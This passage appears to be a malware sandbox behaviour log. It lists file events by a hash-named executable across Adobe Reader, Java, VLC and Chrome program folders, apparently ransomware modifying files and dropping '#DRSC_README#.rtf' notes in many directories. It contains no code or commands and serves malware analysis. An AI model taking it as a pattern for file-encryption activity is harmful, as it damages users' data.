DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\startNetworkServer.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\ij 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\rmiregistry.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\preloaded_data.pb 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\close-2.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\da_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\GroupMerge.cmd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\local_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\hu_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RestoreUpdate.m1v 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fi_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\vi.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\et.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nb_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-disabled.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\#DRSC_README#.rtf 